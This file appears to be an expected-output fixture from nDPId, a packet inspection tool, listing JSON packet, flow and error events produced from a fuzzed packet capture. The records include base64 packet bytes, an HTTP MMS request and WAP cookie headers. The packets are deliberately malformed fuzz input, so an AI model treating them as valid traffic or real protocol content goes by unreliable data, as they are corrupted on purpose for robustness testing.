02307{"packet_event_id":1,"packet_event_name":"packet","packet_id":51,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":1514,"pkt_l4_len":0,"thread_ts_msec":1031854514843,"pkt":"CAAgsl17AFCLk5N8CABFAAXcFaqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="}
00217{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":52,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","l4_data_len":445,"global_ts_msec":1031854514844}
00925{"packet_event_id":1,"packet_event_name":"packet","packet_id":52,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":479,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":479,"pkt_l4_len":0,"thread_ts_msec":1031854514843,"pkt":"CAAgsl0lcwCLk5N8CABFAAHRFktVAIAGhKGsFAMFrBQDDQorAFDkqXCFyh06CVAYIo+iDAAAMjAxLnhtbCIsIjEtT3dQVndnTWs4aXRxR3gwOGZNWXVmdz09IiwiMi1IZ0NURVFFMW8ydmVOM0ZCeW8xLzVnPT0iLCIzLXpJdGdzSXlLQnBCem01c2xPb2RISEE9PSINCkNvb2tpZTpKVXNlci1JZGVudGl0eS1Gb3J3YXJkLXBwcC11c2VybmFtZT2qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="}
00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":53,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1031854514845,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1031854514845,"pkt":"AFCLk5N8CAAgsl17CABFIAAoxL1AAEAGF9isFAMNrBQDBQBQCivKHToJ5KlwhVAQgyxqnAAA"}
00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":56,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854525903,"flow_last_seen":1031854525903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854525903,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"72.20.3.13","src_port":2603,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1031854525903,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1031854525903,"pkt":"CAAgsl17AFCLk5N8CABFAAAoGktAAIAGgkqsFAMFSBQDDQorAFDkqXIuyh06mFARIanJ5gAApxaHSO7L"}
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":57,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854525903,"flow_last_seen":1031854525903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854525903,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.82.5","src_port":80,"dst_port":2603,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":57,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1031854525903,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1031854525903,"pkt":"AFCLk5PaCAAgsl17CABFAAAoxL9AAEAGF9asFAMNrBRSBQBQCivKHTqY5KlyL1AQgyxoYwAA"}
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":59,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854525904,"flow_last_seen":1031854525904,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854525904,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"68.37.115.0","src_port":2603,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1031854525904,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1031854525904,"pkt":"CAAgsl17AFCLk5N8CABFAAAoG0tAAIAGgUqsFAMFRCVzAAorAFDkqXIvyh06mVAQIanJ5QAApxaHSO7L"}
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":60,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854532142,"flow_last_seen":1031854532142,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854532142,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2604,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":60,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1031854532142,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1031854532142,"pkt":"CAAgsl17AFCLk5N8CABFAAAsHktAAIAGfkasFAMFrBQDDQosAFDk5q2kEAAAAGACIAB85AAAAgQFtGDD"}
00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":61,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1031854532142,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1031854532142,"pkt":"AFCLk5N8CAAgsl17CABFAAAsxMFAAEAGF9CsFAMNrBQDBQBQCizKXurZ5OatpWASgyxkbgAAAgQFtA=="}
00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":62,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1031854532142,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1031854532142,"pkt":"CAAgsl17AFCLk5N8CABFAAAoH0tAAIAGfUqsFAMFrBQDDQosAFDk5q2lyl7q2lAQIjjdHwAAAgQFtGDD"}
00927{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":63,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1031854532142,"flow_last_seen":1031854532143,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1460,"flow_avg_l4_payload_len":365,"midstream":0,"thread_ts_msec":1031854532143,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2604,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"172.20.3.13","url":"172.20.3.13\/servlets\/mms?message-id=189001","code":0,"content_type":"","user_agent":"SonyEricssonT68\/R201A"}}
00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":53,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1031854514845,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1031854514845,"pkt":"AFCLk5N8CAAgsl17CABFIAAoxL1AAEAGF9isFAMNrBQDBQBQCivKHToJ5KlwhVAQgyxqnAAA"}
00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":56,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854525903,"flow_last_seen":1031854525903,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854525903,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"72.20.3.13","src_port":2603,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1031854525903,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1031854525903,"pkt":"CAAgsl17AFCLk5N8CABFAAAoGktAAIAGgkqsFAMFSBQDDQorAFDkqXIuyh06mFARIanJ5gAApxaHSO7L"}
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":57,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854525903,"flow_last_seen":1031854525903,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854525903,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.82.5","src_port":80,"dst_port":2603,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":57,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1031854525903,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1031854525903,"pkt":"AFCLk5PaCAAgsl17CABFAAAoxL9AAEAGF9asFAMNrBRSBQBQCivKHTqY5KlyL1AQgyxoYwAA"}
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":59,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854525904,"flow_last_seen":1031854525904,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854525904,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"68.37.115.0","src_port":2603,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1031854525904,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1031854525904,"pkt":"CAAgsl17AFCLk5N8CABFAAAoG0tAAIAGgUqsFAMFRCVzAAorAFDkqXIvyh06mVAQIanJ5QAApxaHSO7L"}
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":60,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854532142,"flow_last_seen":1031854532142,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854532142,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2604,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":60,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1031854532142,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1031854532142,"pkt":"CAAgsl17AFCLk5N8CABFAAAsHktAAIAGfkasFAMFrBQDDQosAFDk5q2kEAAAAGACIAB85AAAAgQFtGDD"}
00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":61,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1031854532142,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1031854532142,"pkt":"AFCLk5N8CAAgsl17CABFAAAsxMFAAEAGF9CsFAMNrBQDBQBQCizKXurZ5OatpWASgyxkbgAAAgQFtA=="}
00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":62,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1031854532142,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1031854532142,"pkt":"CAAgsl17AFCLk5N8CABFAAAoH0tAAIAGfUqsFAMFrBQDDQosAFDk5q2lyl7q2lAQIjjdHwAAAgQFtGDD"}
00927{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":63,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1031854532142,"flow_last_seen":1031854532143,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1460,"flow_avg_l4_payload_len":365,"midstream":0,"thread_ts_msec":1031854532143,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2604,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"172.20.3.13","url":"172.20.3.13\/servlets\/mms?message-id=189001","code":0,"content_type":"","user_agent":"SonyEricssonT68\/R201A"}}
00199{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":64,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","layer_type":59136,"global_ts_msec":1031854532143}
00838{"packet_event_id":1,"packet_event_name":"packet","packet_id":64,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":413,"pkt_type":59136,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":413,"pkt_l4_len":0,"thread_ts_msec":1031854532143,"pkt":"CAAgsl17AFCLk5N85wA1AAGPIUtAAIAGeeOsFAMFrBQDDQosAFDk5rNZyl7q2lAYIjgNigAAWXVTdz09IiwiMi1gZ0NURVFFMW8ydmVOM0ZCeW8xLzVnPT0iLCIzLXpJdGdzSXlLQnBCem01c2xPb2RISEE9PSINCkNvb2t6ZTogVXNlci1JZGVudGl0eS1Gb3J3YXJkLXBwcC11c2VybmFtZT02QzZENjM2RDZGNkM2Ng0KQ29va2llOiBVc2VyLUlkZW50aXR5LUZvcgRhcmQtbXNpc2RuPTO0MzkzMTM3MzIzNjMxMzAzMTMwMzAzNA0KQ29va2llOiBVc2VyLQlkZW50aXR5LUF1dGhlbnRpY2F0aW9uPUJlYXJlcg0KQ29va2llOiBJcC1BZGRyZXNzPTE5Mi4xNjguMi4yNg0KQ29va2llOiBCZWFyZXItVHlwZT1VRFBdCldBUC1Db25uZWN0aW9uOiBTdGFjay1UeXBlPUNPDQpDb29raWU6IHd0bHMtc2VjdXJpdHktbGV2ZWw9bm9uZVQKDQo="}
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":65,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854532143,"flow_last_seen":1031854532143,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854532143,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.68.5","src_port":80,"dst_port":2604,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1031854532143,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1031854532143,"pkt":"AFCLk5N8CAAgsl17CABFAAAoxMJAAEAGF9OsFAMNrBREBQBQCizKXura5OazWVAlcwB2dwAA"}
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":69,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854535021,"flow_last_seen":1031854535021,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854535021,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2605,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":69,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1031854535021,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1031854535021,"pkt":"CAAgsl17AFCLk5N8CABFAAAsJEtAAIAGeEasFAMFrBQDDQotAFDk8VvfAAAAAGACIADOnQAAAgQFtGDD"}
00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":70,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1031854535021,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1031854535021,"pkt":"AFCLk5N8CAAgsl17CABFAAAsxMVAAEAGF8ysFAMNrBQDBQBQCi3KbXHL5PFb4GASgywvJwAAAgQFtA=="}
00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":71,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1031854535021,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1031854535021,"pkt":"CAAgsl17AFCLk5N8CABFAAAoJUtAAIAGd0qsFAMFrBQDDQotAFDk8Vvgym1xzFAQIjin2AAAAgQFtGDD"}
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":65,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854532143,"flow_last_seen":1031854532143,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854532143,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.68.5","src_port":80,"dst_port":2604,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1031854532143,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1031854532143,"pkt":"AFCLk5N8CAAgsl17CABFAAAoxMJAAEAGF9OsFAMNrBREBQBQCizKXura5OazWVAlcwB2dwAA"}
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":69,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854535021,"flow_last_seen":1031854535021,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854535021,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2605,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":69,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1031854535021,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1031854535021,"pkt":"CAAgsl17AFCLk5N8CABFAAAsJEtAAIAGeEasFAMFrBQDDQotAFDk8VvfAAAAAGACIADOnQAAAgQFtGDD"}
